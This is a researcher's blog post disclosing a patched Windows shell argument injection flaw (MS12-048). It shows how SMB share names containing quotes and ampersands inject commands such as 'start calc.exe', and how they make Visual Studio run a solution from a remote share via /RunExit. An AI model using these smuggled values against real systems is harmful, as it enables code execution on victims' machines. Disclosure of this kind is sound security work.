top of page
Search
  • Writer's pictureAdi "Adico" Cohen

Microsoft Windows Shell Argument Injection - MS12-048 (CVE-2012-0175)

Updated: Feb 24, 2019


The following post describes a vulnerability I discovered, allowing the injection of arbitrary arguments into the command string of any application in Windows by tricking the client into opening a specially crafted file.


 

Background:


The Windows File Association allows an application to define a handler that should be called for each operation on a specific file type.


For example, WinRAR registers the file type .RAR in the following manner:


The Open action defined for this file type dictates how the handler should be called upon opening the file.

The command that will be executed for this example of WinRAR is:

"C:\Program Files\WinRAR\WinRAR.exe" "%1"

(Where the %1 is replaced with the filename that the client clicked on)


Theoretically if an attacker was able to create a file named Stu"ff.rar

He will be able to break the command string and inject arbitrary commands.

Of course creating such a file under Windows seems to be impossible



Linux operating systems, unlike Windows, do not limit the use of these special characters as part of a file's name.

Meaning an attacker can create a file called stu"ff.rar



In order to actually test this theory, the Windows operating system must have some sort of access to the file currently placed on another machine.


Trying to download the file through an SSH client

Most applications will fail horribly when trying to copy this file over to the Windows machine and the few that won't, just replace the quotes ( " ) with an underscore ( _ ).


The next possibility to access this file, is through NetBIOS shares, so I've installed a SAMBA server on my Linux machine, created some default shares and copied my malicious looking file in there.



Sadly, Windows changes the display name for these files.

It does the same with folder names.


Windows view of the file



Vulnerability:


The one place missing this protection is the Share Name itself.

By editing the SAMBA configuration in the following way it is possible to create shares that include the forbidden special characters in their name.


Editing the SAMBA configurations

Explorer actually shows the tainted name without any issues.


Viewing the shares under Windows

Even entering the Share proves to work.


When executing a RAR file from the regular share2 folder, all works well.

However when double-clicking a RAR in the second share

WinRAR cannot seem to find the requested file



Viewing the created WinRAR.exe process in Process Explorer reveals the injection has worked.



Example attack scenario #1:


The following attack scenario will allow the attacker to create a malicious Share that targets the "CMD Prompt Here" behavior.




The way that "CMD Prompt Here" normally works is by launching the following command

"cmd.exe" /k cd %1

As can be seen here


An attacker is able to create a new share named:

xxxxx & start calc.exe &


When a victim uses the "CMD Prompt Here" context menu against any folder under the share root, the executed command will be:

"cmd.exe" /k cd \\10.0.0.1\xxxxx & start calc.exe &\AnyOtherFolder


When CMD will start it will also execute calc.exe





Example attack scenario #2:


The following attack scenario will allow the attacker to create a link to a visual studio solution (.SLN) file that once opened will automatically compile and execute itself.


By creating three SMB shares named:

1. Test Injection "/RunExit \\9.148.197.235\share2

2. Test Injection "

3. share2



And the following folder tree under the mapped folder (/home/share2 in the case of this example)


Notice that the content of the ArgumentInjection folder is not shown. It contains all the visual studio solution files and should not be changed

The result of these configurations should look as such:



By entering the first (long) folder and opening the SLN file with the devenv.exe handler (Default), the following command should be executed:





The devenv.exe handler receives four parameters:

  1. The first part of the path - "\\9.148.197.235\Test Injection "

  2. The injected parameter - /RunExit

  3. The injected path to be used - \\9.148.197.235\share2\ArgumentInjection.sln

  4. The remaining part of the original path - .sln"


The first and last parameters are being ignored while the two middle parameters causes visual studio to compile and execute the desired solution.


Impact:


By using this technique, an attacker is able to inject custom arguments into every application that registered a file-type handler using the described method.


Remediation:


Microsoft has issued the following patch to address this issue



 

An old post from 2012. Originally published under Watchfire's (IBM) Blog

Discovered by - Adi Cohen, IBM Application Security Research

105 views0 comments

Recent Posts

See All

XSS in Gmail's Amp4Email

Background AMP is most commonly used as a framework to develop fast-loading content on the web. One of AMP's projects, AMP4Email has been adopted in recent years by many of the leading mail services a

JSON-based XSS exploitation

The following post describes a new method to exploit injections in JSON file - Back in 2012 Introduction: In the world of Web2.0 and mash web applications, security researchers come across more and mo

Microsoft Anti-XSS Library Bypass (MS12-007)

The following post describes the second bypass I found to the toStaticHTML function in IE - back in 2012. Introduction: The Microsoft Anti-XSS Library is used in ASP .NET applications to protect again

bottom of page